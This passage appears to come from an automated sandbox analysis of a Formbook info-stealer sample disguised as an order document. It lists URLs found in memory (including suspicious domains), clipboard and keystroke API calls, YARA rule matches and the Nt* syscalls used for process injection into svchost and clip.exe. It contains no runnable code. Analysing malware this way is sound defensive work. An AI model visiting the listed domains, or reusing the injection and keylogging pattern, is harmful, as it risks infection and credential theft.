            Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10332
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2055060671.000000000789A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
            Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png
            Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png
            Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.4134771184.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.0000000016C44000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4134771184.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.0000000016C44000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&amp;YXDT=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
            Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009F425A
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009F4458
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009F425A
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_009E0219
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00A0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A0CDAC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: This is a third-party compiled AutoIt script.0_2_00983B4C
            Source: MV Sunshine, ORDER.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: MV Sunshine, ORDER.exe, 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_22f29a9b-c
            Source: MV Sunshine, ORDER.exe, 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1aae5dbc-8
            Source: MV Sunshine, ORDER.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f977fb97-6
            Source: MV Sunshine, ORDER.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dd79ca38-5
            Source: initial sampleStatic PE information: Filename: MV Sunshine, ORDER.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042AFF3 NtClose,1_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974340 NtSetContextThread,1_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974650 NtSuspendThread,1_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtCreateSection,1_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C60 NtCreateKey,1_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973090 NtSetValueKey,1_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D70 NtOpenThread,1_2_03973D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04844650 NtSuspendThread,LdrInitializeThunk,3_2_04844650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04844340 NtSetContextThread,LdrInitializeThunk,3_2_04844340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04842CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842C60 NtCreateKey,LdrInitializeThunk,3_2_04842C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04842C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842DD0 NtDelayExecution,LdrInitializeThunk,3_2_04842DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04842DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04842D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04842D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04842E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04842EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842FB0 NtResumeThread,LdrInitializeThunk,3_2_04842FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842FE0 NtCreateFile,LdrInitializeThunk,3_2_04842FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842F30 NtCreateSection,LdrInitializeThunk,3_2_04842F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842AD0 NtReadFile,LdrInitializeThunk,3_2_04842AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842AF0 NtWriteFile,LdrInitializeThunk,3_2_04842AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04842BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04842BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04842BE0
